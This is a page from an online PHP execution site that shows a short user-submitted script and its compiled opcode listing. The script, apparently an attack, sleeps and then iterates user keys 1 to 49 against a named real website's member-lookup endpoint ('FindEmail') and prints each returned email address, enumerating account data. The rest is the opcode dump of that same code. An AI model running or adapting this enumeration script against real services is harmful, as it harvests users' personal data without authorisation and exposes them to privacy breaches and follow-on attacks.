3v4l.org

run code in 300+ PHP versions simultaneously
<?php sleep(50); for($i = 1; $i < 50; $i++) { $email = file_get_contents('http://www.redbana.com/MemberShip/SearchIDPWValidation.aspx?Method=FindEmail&UserKey='.$i); echo $email.'<br>'; } ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 13
Branch analysis from position: 13
2 jumps found. (Code = 44) Position 1 = 15, Position 2 = 5
Branch analysis from position: 15
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 5
2 jumps found. (Code = 44) Position 1 = 15, Position 2 = 5
Branch analysis from position: 15
Branch analysis from position: 5
filename:       /in/0SmPg
function name:  (null)
number of ops:  16
compiled vars:  !0 = $i, !1 = $email
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   INIT_FCALL                                               'sleep'
          1        SEND_VAL                                                 50
          2        DO_ICALL                                                 
    3     3        ASSIGN                                                   !0, 1
          4      > JMP                                                      ->13
    5     5    >   INIT_FCALL                                               'file_get_contents'
          6        CONCAT                                           ~4      'http%3A%2F%2Fwww.redbana.com%2FMemberShip%2FSearchIDPWValidation.aspx%3FMethod%3DFindEmail%26UserKey%3D', !0
          7        SEND_VAL                                                 ~4
          8        DO_ICALL                                         $5      
          9        ASSIGN                                                   !1, $5
    6    10        CONCAT                                           ~7      !1, '%3Cbr%3E'
         11        ECHO                                                     ~7
    3    12        PRE_INC                                                  !0
         13    >   IS_SMALLER                                               !0, 50
         14      > JMPNZ                                                    ~9, ->5
    8    15    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
155.02 ms | 1386 KiB | 17 Q